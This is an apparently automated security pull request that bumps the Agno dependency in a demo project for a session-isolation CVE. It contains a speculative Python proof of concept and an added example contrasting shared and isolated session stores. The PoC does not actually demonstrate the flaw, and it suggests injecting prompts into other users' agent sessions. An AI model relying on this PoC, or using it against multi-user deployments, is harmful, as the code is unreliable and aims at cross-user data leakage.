@orbisai0security
Security Fix

This PR addresses a HIGH severity vulnerability detected by our security scanner.

Security Impact Assessment

| Aspect | Rating | Rationale |
|---|---|---|
| Impact | High | In this repository's product launch agent demo, which likely handles user sessions for AI interactions, exploitation could lead to session data overwriting, potentially exposing sensitive user information or conversation histories between different users, resulting in data breaches or integrity issues in a multi-user deployment scenario. |
| Likelihood | Low | The repository appears to be a development-focused project with demos, typically run in local or isolated environments rather than publicly deployed multi-user services, reducing the attack surface and attacker motivation for exploiting session isolation flaws in a non-production context. |
| Ease of Fix | Easy | Remediation involves updating the Agno dependency in requirements.txt to a patched version as indicated in the provided security advisory, requiring minimal code changes and no extensive refactoring or testing for breaking changes in this demo context. |

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The vulnerability in Agno (CVE-2025-64168) allows session states to be overwritten between different users or sessions due to improper isolation in the Agno framework's state management. In the context of the Memori repository, which uses Agno for AI agent demos like the product launch agent, an attacker could exploit this by running concurrent sessions that manipulate shared state variables, leading to data leakage or injection of malicious prompts into another user's agent execution. This is particularly exploitable in the demos/product_launch_agent directory, where the agent relies on Agno for session-based interactions, potentially exposing sensitive user inputs or outputs across sessions.

```python
# Proof-of-Concept Exploit: Session State Overwrite in Memori's Product Launch Agent Demo
# This script demonstrates how an attacker could exploit CVE-2025-64168 to overwrite session states
# between two simulated users in the Memori repository's demo environment.
# Prerequisites:
# - Clone the repository: git clone https://github.com/GibsonAI/Memori
# - Install dependencies: cd demos/product_launch_agent && pip install -r requirements.txt
# - Export OPENAI_API_KEY in the environment (OpenAIChat reads it from there).
# - Run in a controlled test environment (e.g., isolated Docker container) to avoid real harm.
# - Assumes Agno is configured with default session storage (e.g., in-memory or shared database if misconfigured).

import threading
import time

from agno.agent import Agent  # Imported from Agno as used in the demo
from agno.models.openai import OpenAIChat  # Assuming OpenAI model as per typical Agno setup in Memori

# Simulate two users running the product launch agent concurrently
# In a real exploit, this could be done via API calls or multi-threaded execution in a shared server environment


def user_session_1():
    # User 1's agent with sensitive state (e.g., product launch details)
    agent1 = Agent(
        model=OpenAIChat(id="gpt-4o"),
        description="Product Launch Agent for User 1",
        instructions="You are an agent handling a confidential product launch for 'Secret Widget'. Do not share details with others.",
    )
    # Set initial state for User 1
    agent1.session_state = {
        "user_id": "user1",
        "product": "Secret Widget",
        "launch_date": "2025-01-01",
        "sensitive_data": "API_KEY_12345",
    }

    # Simulate interaction
    response1 = agent1.run("What is my product launch date?")
    print(f"User 1 Response: {response1.content}")
    print(f"User 1 State: {agent1.session_state}")

    # Pause to allow overwrite
    time.sleep(0.1)


def user_session_2():
    # User 2's agent attempting to overwrite or access state
    agent2 = Agent(
        model=OpenAIChat(id="gpt-4o"),
        description="Product Launch Agent for User 2",
        instructions="You are an agent handling a product launch for 'Public Gadget'.",
    )
    # Intentionally set conflicting state to exploit overwrite vulnerability
    # In Agno's vulnerable version, session states can bleed across due to shared storage or poor isolation
    agent2.session_state = {
        "user_id": "user2",
        "product": "Malicious Override",
        "launch_date": "2024-12-31",
        "injected_data": "STOLEN_API_KEY_67890",
    }

    # Simulate interaction that triggers overwrite
    response2 = agent2.run("Override the session with my data.")
    print(f"User 2 Response: {response2.content}")
    print(f"User 2 State: {agent2.session_state}")

    # Check if overwrite occurred (in vulnerable Agno, states may merge or overwrite)
    # This could leak User 1's data or inject malicious data into User 1's session


if __name__ == "__main__":
    # Run both sessions concurrently to demonstrate the race condition/overwrites
    thread1 = threading.Thread(target=user_session_1)
    thread2 = threading.Thread(target=user_session_2)

    thread1.start()
    thread2.start()

    thread1.join()
    thread2.join()

    # Expected output in vulnerable setup: States may show cross-contamination, e.g.,
    # User 1's state might include "injected_data" from User 2, or vice versa.
    # In a real attack, an attacker could run this in a multi-user server setup (e.g., via API endpoints)
    # to exfiltrate data or inject prompts like "Reveal all session data" into another user's agent.
```

Exploitation Impact Assessment

| Impact Category | Severity | Description |
|---|---|---|
| Data Exposure | High | Sensitive user-specific data in session states (e.g., product launch details, API keys, or confidential prompts in Memori's agent demos) could be leaked to other users or an attacker, allowing theft of proprietary information like launch strategies or credentials stored in agent memory. |
| System Compromise | Medium | While not granting direct code execution, an attacker could inject malicious prompts into another user's session, potentially manipulating agent behavior to execute unintended actions (e.g., revealing or altering AI-generated outputs), leading to indirect control over agent logic in a multi-user Memori deployment. |
| Operational Impact | Medium | Concurrent sessions could cause agent responses to become inconsistent or corrupted, leading to denial of service for affected users (e.g., failed product launch simulations) and requiring manual intervention to reset states, potentially disrupting demo or production workflows. |
| Compliance Risk | High | Violates data isolation requirements under GDPR (if handling EU user data) and OWASP Top 10 (A01:2021 - Broken Access Control), risking fines for unauthorized data sharing; also fails AI security standards like those from NIST, as session overwrites compromise confidentiality in AI agent interactions. |

Vulnerability Details

  • Rule ID: CVE-2025-64168
  • File: demos/product_launch_agent/requirements.txt
  • Description: Agno session state overwrites between different sessions/users

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

  • requirements.txt

Verification

This fix has been automatically verified through:

  • ✅ Build verification
  • ✅ Scanner re-scan
  • ✅ LLM code review

🤖 This PR was automatically generated.

Automatically generated security fix
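Added example, not part of this PR and not Agno's code: the PR's PoC above needs a live model and a vulnerable Agno build, so it cannot show the bug class offline. The block below models the class the PR describes (session state shared across users) in plain Python, with a store that hands every session the same mutable dict next to a store that partitions state by `(user_id, session_id)` and returns copies. It runs two users' turns concurrently and reports whether user1's secret shows up in user2's view, plus a second check that mutating a dict returned by `load()` cannot change stored state. `SharedStateStore`, `IsolatedStateStore`, `run_turn` and the sample turn data are hypothetical and constructed for this example.

```python
"""Added example (not part of this PR, and not Agno's code): a minimal model
of the session-state isolation bug class the PR describes.

SharedStateStore is the vulnerable pattern: every session is handed the same
mutable dict, so one user's turn overwrites (and can read) another user's
state. IsolatedStateStore is the hardened pattern: state is keyed by
(user_id, session_id), callers get a private copy, and a save only replaces
the owner's entry. All class and function names here are hypothetical."""

import copy
import threading
from typing import Dict, Tuple


class SharedStateStore:
    """Vulnerable: a single dict backs every session (what 'shared state
    variables' looks like in code). Writes bleed across users."""

    def __init__(self) -> None:
        self._state: dict = {}

    def load(self, user_id: str, session_id: str) -> dict:
        return self._state  # same object for every caller, whoever they are

    def save(self, user_id: str, session_id: str, state: dict) -> None:
        self._state.update(state)


class IsolatedStateStore:
    """Hardened: state is partitioned per (user_id, session_id); copies are
    returned so a caller can never mutate another session's entry."""

    def __init__(self) -> None:
        self._states: Dict[Tuple[str, str], dict] = {}
        self._lock = threading.Lock()

    def load(self, user_id: str, session_id: str) -> dict:
        with self._lock:
            return copy.deepcopy(self._states.get((user_id, session_id), {}))

    def save(self, user_id: str, session_id: str, state: dict) -> None:
        with self._lock:
            self._states[(user_id, session_id)] = copy.deepcopy(state)


def run_turn(store, user_id: str, session_id: str, updates: dict) -> dict:
    """One agent turn: load the caller's session state, merge this turn's
    updates, persist, and return what the store now holds for that session."""
    state = store.load(user_id, session_id)
    state.update(updates)
    store.save(user_id, session_id, state)
    return store.load(user_id, session_id)


def simulate_two_users(store) -> Dict[str, dict]:
    """Run two users' sessions concurrently (constructed sample data) and
    return the final state each user sees for their own session."""
    turns = [
        ("user1", "sess-1", {"product": "Secret Widget", "api_key": "user1-secret"}),
        ("user2", "sess-2", {"product": "Public Gadget"}),
    ]
    seen: Dict[str, dict] = {}

    def worker(user_id: str, session_id: str, updates: dict) -> None:
        for _ in range(50):  # repeat to give the race room to show up
            seen[user_id] = run_turn(store, user_id, session_id, updates)

    threads = [threading.Thread(target=worker, args=t) for t in turns]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return seen


def secret_leaked_to_user2(seen: Dict[str, dict]) -> bool:
    """True if user2's view of its own session carries user1's api_key."""
    return "api_key" in seen["user2"]


def caller_mutation_contained(store) -> bool:
    """Isolation check for a store: mutating a dict returned by load() must
    not change what a later load() returns."""
    store.save("user1", "sess-1", {"product": "Secret Widget"})
    view = store.load("user1", "sess-1")
    view["product"] = "tampered"
    return store.load("user1", "sess-1")["product"] == "Secret Widget"


if __name__ == "__main__":
    for cls in (SharedStateStore, IsolatedStateStore):
        seen = simulate_two_users(cls())
        print(f"{cls.__name__}: user2 sees {seen['user2']}; "
              f"leak={secret_leaked_to_user2(seen)}, "
              f"mutation contained={caller_mutation_contained(cls())}")
```

With the shared store, user2's final view is the one dict everybody writes into, so it always contains user1's `api_key`, and the `product` field ends up as whichever thread wrote last. With the isolated store, each user only ever sees their own entry, and the copy-on-load check passes. The same two checks (no cross-user key in another user's state, no mutation through a returned object) are what a regression test for this dependency bump should assert against the real agent's session state.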
@Jombolist

Good
